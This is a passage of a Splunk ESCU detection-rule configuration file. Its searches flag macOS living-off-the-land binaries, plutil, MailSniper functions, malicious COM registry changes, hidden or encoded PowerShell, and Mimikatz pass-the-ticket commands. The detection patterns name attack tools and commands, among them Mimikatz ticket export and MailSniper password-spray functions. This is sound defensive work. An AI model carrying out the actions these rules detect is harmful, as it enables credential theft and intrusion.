action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - MacOS LOLbin - Rule
action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.004", "T1059"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = Detect multiple executions of Living off the Land (LOLbin) binaries in a short period of time.
action.notable.param.rule_title = MacOS LOLbin
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `osquery` name=es_process_events columns.cmdline IN ("find*", "crontab*", "screencapture*", "openssl*", "curl*", "wget*", "killall*", "funzip*") | rename columns.* as * | stats min(_time) as firstTime max(_time) as lastTime values(cmdline) as cmdline, values(pid) as pid, values(parent) as parent, values(path) as path, values(signing_id) as signing_id, dc(path) as dc_path by username host | rename username as user, cmdline as process, path as process_path, host as dest | where dc_path > 3 | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `macos_lolbin_filter`

[ESCU - MacOS plutil - Rule]
action.escu = 0
action.escu.enabled = 1
description = Detect usage of plutil to modify plist files. Adversaries can modify plist files to execute binaries or add command line arguments. Plist files in auto-run locations are executed upon user logon or system startup.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1647"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = Detect usage of plutil to modify plist files. Adversaries can modify plist files to execute binaries or add command line arguments. Plist files in auto-run locations are executed upon user logon or system startup.
action.escu.how_to_implement = This detection uses osquery and endpoint security on MacOS. Follow the link in references, which describes how to set up process auditing in MacOS with endpoint security and osquery.
action.escu.known_false_positives = Administrators using plutil to change plist files.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - MacOS plutil - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = plutil was executed on $dest$ by $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - MacOS plutil - Rule
action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1647"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = Detect usage of plutil to modify plist files. Adversaries can modify plist files to execute binaries or add command line arguments. Plist files in auto-run locations are executed upon user logon or system startup.
action.notable.param.rule_title = MacOS plutil
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `osquery` name=es_process_events columns.path=/usr/bin/plutil | rename columns.* as * | stats count min(_time) as firstTime max(_time) as lastTime by username host cmdline pid path parent signing_id | rename username as user, cmdline as process, path as process_path, host as dest | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `macos_plutil_filter`

[ESCU - Mailsniper Invoke functions - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects known mailsniper.ps1 functions executed on a machine. This technique has been used by attackers to harvest sensitive e-mail from a compromised Exchange server.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search detects known mailsniper.ps1 functions executed on a machine. This technique has been used by attackers to harvest sensitive e-mail from a compromised Exchange server.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting PowerShell logs from your endpoints. Make sure you enable the registry settings needed to log this event.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2022-05-02
action.escu.modification_date = 2022-05-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - Mailsniper Invoke functions - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Data Exfiltration"]
action.risk = 1
action.risk.param._risk_message = mailsniper.ps1 functions $ScriptBlockText$ executed on $dest$ by user $user$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Mailsniper Invoke functions - Rule
action.correlationsearch.annotations = {"analytic_story": ["Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects known mailsniper.ps1 functions executed on a machine. This technique has been used by attackers to harvest sensitive e-mail from a compromised Exchange server.
action.notable.param.rule_title = Mailsniper Invoke functions
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText IN ("*Invoke-GlobalO365MailSearch*", "*Invoke-GlobalMailSearch*", "*Invoke-SelfSearch*", "*Invoke-PasswordSprayOWA*", "*Invoke-PasswordSprayEWS*","*Invoke-DomainHarvestOWA*", "*Invoke-UsernameHarvestOWA*","*Invoke-OpenInboxFinder*","*Invoke-InjectGEventAPI*","*Invoke-InjectGEvent*","*Invoke-SearchGmail*", "*Invoke-MonitorCredSniper*", "*Invoke-AddGmailRule*","*Invoke-PasswordSprayEAS*","*Invoke-UsernameHarvestEAS*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `mailsniper_invoke_functions_filter`

[ESCU - Malicious InProcServer32 Modification - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a process modifying the registry with a known malicious CLSID under InProcServer32. Most COM classes are registered with the operating system and are identified by a GUID that represents the Class Identifier (CLSID) within the registry (usually under HKLM\\Software\\Classes\\CLSID or HKCU\\Software\\Classes\\CLSID). Behind the implementation of a COM class is the server (some binary) that is referenced within registry keys under the CLSID. The LocalServer32 key represents a path to an executable (exe) implementation, and the InprocServer32 key represents a path to a dynamic link library (DLL) implementation (Bohops). During triage, review parallel processes for suspicious activity. Pivot on the process GUID to see the full timeline of events. Analyze the value and look for file modifications. Because this is looking for InprocServer32, a DLL found in the value will most likely be loaded by a parallel process.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.010", "T1112"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies a process modifying the registry with a known malicious CLSID under InProcServer32. Most COM classes are registered with the operating system and are identified by a GUID that represents the Class Identifier (CLSID) within the registry (usually under HKLM\\Software\\Classes\\CLSID or HKCU\\Software\\Classes\\CLSID). Behind the implementation of a COM class is the server (some binary) that is referenced within registry keys under the CLSID. The LocalServer32 key represents a path to an executable (exe) implementation, and the InprocServer32 key represents a path to a dynamic link library (DLL) implementation (Bohops). During triage, review parallel processes for suspicious activity. Pivot on the process GUID to see the full timeline of events. Analyze the value and look for file modifications. Because this is looking for InprocServer32, a DLL found in the value will most likely be loaded by a parallel process.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives should be limited, filter as needed. In our test case, Remcos used regsvr32.exe to modify the registry. It may be required, dependent upon the EDR tool producing registry events, to remove (Default) from the command-line.
action.escu.creation_date = 2021-10-05
action.escu.modification_date = 2021-10-05
action.escu.confidence = high
action.escu.full_search_name = ESCU - Malicious InProcServer32 Modification - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious Regsvr32 Activity", "Remcos"]
action.risk = 1
action.risk.param._risk_message = The $process_name$ was identified on endpoint $dest$ modifying the registry with a known malicious CLSID under InProcServer32.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Malicious InProcServer32 Modification - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvr32 Activity", "Remcos"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.010", "T1112"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a process modifying the registry with a known malicious CLSID under InProcServer32. Most COM classes are registered with the operating system and are identified by a GUID that represents the Class Identifier (CLSID) within the registry (usually under HKLM\\Software\\Classes\\CLSID or HKCU\\Software\\Classes\\CLSID). Behind the implementation of a COM class is the server (some binary) that is referenced within registry keys under the CLSID. The LocalServer32 key represents a path to an executable (exe) implementation, and the InprocServer32 key represents a path to a dynamic link library (DLL) implementation (Bohops). During triage, review parallel processes for suspicious activity. Pivot on the process GUID to see the full timeline of events. Analyze the value and look for file modifications. Because this is looking for InprocServer32, a DLL found in the value will most likely be loaded by a parallel process.
action.notable.param.rule_title = Malicious InProcServer32 Modification
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes by _time Processes.process_id Processes.process_name Processes.dest Processes.process_guid Processes.user | `drop_dm_object_name(Processes)` | join process_guid [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\CLSID\\{89565275-A714-4a43-912E-978B935EDCCC}\\InProcServer32\\(Default)" by Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.dest Registry.process_guid Registry.user | `drop_dm_object_name(Registry)` | fields _time dest registry_path registry_key_name registry_value_name process_name process_path process process_guid user] | stats count min(_time) as firstTime max(_time) as lastTime by dest, process_name registry_path registry_key_name registry_value_name user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_inprocserver32_modification_filter`

[ESCU - Malicious Powershell Executed As A Service - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection identifies abuse of the Windows SC.exe to execute malicious commands or payloads via PowerShell.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This detection identifies abuse of the Windows SC.exe to execute malicious commands or payloads via PowerShell.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows System logs with the Service Name, Service File Name, Service Start Type, and Service Type from your endpoints.
action.escu.known_false_positives = Creating a hidden PowerShell service is rare, and this detection could key off of those instances.
action.escu.creation_date = 2021-04-07
action.escu.modification_date = 2021-04-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Malicious Powershell Executed As A Service - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Malicious PowerShell", "Rhysida Ransomware"]
action.risk = 1
action.risk.param._risk_message = Identifies abuse of the Windows SC.exe to execute malicious PowerShell as a service $Service_File_Name$ by $user$ on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Malicious Powershell Executed As A Service - Rule
action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This detection identifies abuse of the Windows SC.exe to execute malicious commands or payloads via PowerShell.
action.notable.param.rule_title = Malicious Powershell Executed As A Service
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_system` EventCode=7045 | eval l_Service_File_Name=lower(Service_File_Name) | regex l_Service_File_Name="powershell[.\s]|powershell_ise[.\s]|pwsh[.\s]|psexec[.\s]" | regex l_Service_File_Name="-nop[rofile\s]+|-w[indowstyle]*\s+hid[den]*|-noe[xit\s]+|-enc[odedcommand\s]+" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Service_File_Name Service_Name Service_Start_Type Service_Type Service_Account user dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_powershell_executed_as_a_service_filter`

[ESCU - Malicious PowerShell Process - Encoded Command - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the use of the EncodedCommand PowerShell parameter. This is typically used by Administrators to run complex scripts, but commonly used by adversaries to hide their code. \
The analytic identifies all variations of EncodedCommand, as PowerShell allows the ability to shorten the parameter. For example enc, enco, encod and so forth. In addition, through our research it was identified that PowerShell will interpret different command switch types beyond the hyphen. We have added endash, emdash, horizontal bar, and forward slash. \
During triage, review parallel events to determine legitimacy. Tune as needed based on admin scripts in use. \
Alternatively, a regex may be used, per the matching here: https://regexr.com/662ov.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies the use of the EncodedCommand PowerShell parameter. This is typically used by Administrators to run complex scripts, but commonly used by adversaries to hide their code. \
The analytic identifies all variations of EncodedCommand, as PowerShell allows the ability to shorten the parameter. For example enc, enco, encod and so forth. In addition, through our research it was identified that PowerShell will interpret different command switch types beyond the hyphen. We have added endash, emdash, horizontal bar, and forward slash. \
During triage, review parallel events to determine legitimacy. Tune as needed based on admin scripts in use. \
Alternatively, a regex may be used, per the matching here: https://regexr.com/662ov.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = System administrators may use this option, but it's not common.
action.escu.creation_date = 2022-01-18
action.escu.modification_date = 2022-01-18
action.escu.confidence = high
action.escu.full_search_name = ESCU - Malicious PowerShell Process - Encoded Command - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Hermetic Wiper", "Malicious PowerShell", "NOBELIUM Group", "WhisperGate", "DarkCrystal RAT", "Qakbot", "CISA AA22-320A", "Sandworm Tools", "Data Destruction", "Volt Typhoon"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Malicious PowerShell Process - Encoded Command - Rule
action.correlationsearch.annotations = {"analytic_story": ["Hermetic Wiper", "Malicious PowerShell", "NOBELIUM Group", "WhisperGate", "DarkCrystal RAT", "Qakbot", "CISA AA22-320A", "Sandworm Tools", "Data Destruction", "Volt Typhoon"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` by Processes.user Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name Processes.dest Processes.process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where match(process,"(?i)[\-|\/|–|—|―]e(nc*o*d*e*d*c*o*m*m*a*n*d*)*\s+[^-]") | `malicious_powershell_process___encoded_command_filter`

[ESCU - Malicious PowerShell Process - Execution Policy Bypass - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for PowerShell processes started with parameters used to bypass the local execution policy for scripts. These parameters are often observed in attacks leveraging PowerShell scripts as they override the default PowerShell execution policy.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for PowerShell processes started with parameters used to bypass the local execution policy for scripts. These parameters are often observed in attacks leveraging PowerShell scripts as they override the default PowerShell execution policy.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = There may be legitimate reasons to bypass the PowerShell execution policy. The PowerShell script being run with this parameter should be validated to ensure that it is legitimate.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Malicious PowerShell Process - Execution Policy Bypass - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["DHS Report TA18-074A", "HAFNIUM Group", "DarkCrystal RAT", "AsyncRAT", "Volt Typhoon"]
action.risk = 1
action.risk.param._risk_message = PowerShell local execution policy bypass attempt on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Malicious PowerShell Process - Execution Policy Bypass - Rule
action.correlationsearch.annotations = {"analytic_story": ["DHS Report TA18-074A", "HAFNIUM Group", "DarkCrystal RAT", "AsyncRAT", "Volt Typhoon"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for PowerShell processes started with parameters used to bypass the local execution policy for scripts. These parameters are often observed in attacks leveraging PowerShell scripts as they override the default PowerShell execution policy.
action.notable.param.rule_title = Malicious PowerShell Process - Execution Policy Bypass
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(Processes.process_id) as process_id, values(Processes.parent_process_id) as parent_process_id values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process="* -ex*" OR Processes.process="* bypass *") by Processes.process_id, Processes.user, Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_powershell_process___execution_policy_bypass_filter`

[ESCU - Malicious PowerShell Process With Obfuscation Techniques - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for PowerShell processes launched with arguments that have characters indicative of obfuscation on the command-line.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for PowerShell processes launched with arguments that have characters indicative of obfuscation on the command-line.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = These characters might be legitimately on the command-line, but it is not common.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Malicious PowerShell Process With Obfuscation Techniques - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"]
action.risk = 1
action.risk.param._risk_message = Powershell.exe running with potentially obfuscated arguments on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Malicious PowerShell Process With Obfuscation Techniques - Rule
action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for PowerShell processes launched with arguments that have characters indicative of obfuscation on the command-line.
action.notable.param.rule_title = Malicious PowerShell Process With Obfuscation Techniques
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` by Processes.user Processes.process_name Processes.original_file_name Processes.parent_process_name Processes.dest Processes.process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | eval num_obfuscation = (mvcount(split(process,"`"))-1) + (mvcount(split(process, "^"))-1) + (mvcount(split(process, "'"))-1) | `malicious_powershell_process_with_obfuscation_techniques_filter` | search num_obfuscation > 10

[ESCU - Mimikatz PassTheTicket CommandLine Parameters - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic looks for the use of Mimikatz command line parameters leveraged to execute pass the ticket attacks. Red teams and adversaries alike may use the pass the ticket technique using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Defenders should be aware that adversaries may customize the source code of Mimikatz and modify the command line parameters. This would effectively bypass this analytic.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.003"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic looks for the use of Mimikatz command line parameters leveraged to execute pass the ticket attacks. Red teams and adversaries alike may use the pass the ticket technique using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Defenders should be aware that adversaries may customize the source code of Mimikatz and modify the command line parameters. This would effectively bypass this analytic.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although highly unlikely, legitimate applications may use the same command line parameters as Mimikatz.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Mimikatz PassTheTicket CommandLine Parameters - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Sandworm Tools", "CISA AA23-347A", "CISA AA22-320A", "Active Directory Kerberos Attacks"]
action.risk = 1
action.risk.param._risk_message = Mimikatz command line parameters for pass the ticket attacks were used on $dest$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 36}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Mimikatz PassTheTicket CommandLine Parameters - Rule
action.correlationsearch.annotations = {"analytic_story": ["Sandworm Tools", "CISA AA23-347A", "CISA AA22-320A", "Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic looks for the use of Mimikatz command line parameters leveraged to execute pass the ticket attacks. Red teams and adversaries alike may use the pass the ticket technique using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Defenders should be aware that adversaries may customize the source code of Mimikatz and modify the command line parameters. This would effectively bypass this analytic.
action.notable.param.rule_title = Mimikatz PassTheTicket CommandLine Parameters
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process = "*sekurlsa::tickets /export*" OR Processes.process = "*kerberos::ptt*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `mimikatz_passtheticket_commandline_parameters_filter`

[ESCU - Mmc LOLBAS Execution Process Spawn - Rule]
action.escu = 0
action.escu.enabled = 1
